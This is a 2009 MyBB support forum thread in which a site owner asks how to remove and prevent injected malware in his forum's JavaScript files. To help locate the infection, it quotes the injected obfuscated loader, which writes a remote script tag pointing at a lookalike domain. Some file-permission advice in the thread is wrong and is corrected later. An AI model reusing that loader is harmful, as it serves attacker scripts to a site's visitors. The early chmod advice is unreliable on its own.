MyBB Community Forums

First off I'm not too familiar with security and scripts. So I apologize if my terminology is not correct.

Recently my site www.ej8squad.com has been violated by a a script pointing to malware from "go00ogle.net". Google Chrome and Safari browsers flagged my site as having malware from "\go00ogle.net. I had no idea what to do so I looked around and decided to replace everything in the "jscripts" folder with fresh copies. Luckily that seemed to fix the problem.

Well, it came back today. I contacted an admin of another site which is using phpbb. Anyway, he was nice enough to recommend I use Grep and download my entire site locally and run the query below.

grep advQuery C:\place_where_you_copied_your_website\*.* -r

He also told me to look for this code.

function advQuery()
{
    var Host="http://google.com/";Track="/if.php";get=unescape("%6E%65%74");
    document.write(unescape("%3Cscript src='"+Host.substr(0,9)+unescape("\u0030\u0030")+Host.substr(9,5)+get));
    document.write(unescape(Track+"' type='text/javascript'%3E%3C/script%3E"));
}
;advQuery();

I ran grep and found the bad code in ".\jscripts\prototype.js". Uploaded a fresh copy and according to Firefox add-on NoScript the script is not loading anymore.

How can I stop from getting infected for a third time? Is this a bug in MyBB or a poorly written plugin?

Thanks for reading,

Jeremy

it would be best if you actually investigated and located the real source of the problem, i.e. who added this and how. if you remember the timestamp of the modified jscript file, checking the access.log for that time may be a good start.

otherwise do the following:

change all your ftp / ssh / database passwords.

check all your files, if in doubt reupload.

chmod all your files and folders to minimal settings. MyBB needs to be able to write only a very few files / folders. everything else should be read-only (e.g. chmod 555 instead of 777). this way you'd prevent even a poorly written plugin from changing anything with those files, since they lack permissions to change anything.

Thanks for the tips sir. Unfortunately my current skills do not allow me to track down how they "got in". But I am willing to learn and would love to find out who/how/where to they got it.

I have since then changed my ftp / ssh passwords. I have not changed any database passwords which I will do now.

chmod the files to 555 is a good idea. Any idea which ones MyBB needs to write to?

(2009-06-12, 06:04 PM)gimmezell Wrote: [ -> ]chmod the files to 555 is a good idea. Any idea which ones MyBB needs to write to?

./inc/settings.php, ./cache/, ./cache/themes/, ./uploads/, ./uploads/avatars/, ./admin/backups/ if you want to use that feature, language files to edit them via the ACP.

(2009-06-12, 06:13 PM)MattRogowski Wrote: [ -> ]./inc/settings.php, ./cache/, ./cache/themes/, ./uploads/, ./uploads/avatars/, ./admin/backups/ if you want to use that feature, language files to edit them via the ACP.

Thanks Matt. So the above files and folders should have what chod setting, 666?
Everything else could be set at 555?

settings.php needs to be 666, the rest need to be 777 because they're folders. All the other files can be 444 if you're really paranoid, not sure what the lowest a folder can be is though.

Not sure what I did but when chmod the "jscripts" folder. But I appear to have lost all javascript ability. When viewing a template in the ACP I don't have the drop down box anymore. Only choice I have is "edit".

I feel like an idiot. What did I do here?

555 on a folder means anyone can cd into it and read (but not write / create files).

this should be sufficient for any static files that aren't supposed to be changed, but I forgot that some webservers may have something set up that makes them refuse to look at anything that does not have standard chmod settings.

setting files and folders to minimum chmod (i.e. world even to 0) is something I would do on my root server, but it's probably a bad advice to give to someone who uses unknown hosting or who doesn't understand linux file permissions. Sorry for giving this advice, I wasn't thinking.

It seems that your webserver believes it has no longer permissions to read the files in your jscripts folder. Either because it is setup in a way to do so if you set chmod to minimum settings, or because you set it too low.

try accessing the file directly to see the error:
http://www.ej8squad.com/jscripts/prototype.js?ver=1400

No worries frostschultz. Your intentions were good.

The permissions on the "jscripts" is currently set at 644. I cannot access the file directly. I get a "403 Forbidden" error.

I did change the password of the MyBB database via my webserver control panel. I also changed the "config.php" to reflect the change. Did doing so somehow screw up my javascript?

folders need the execute bit (1) so make that 755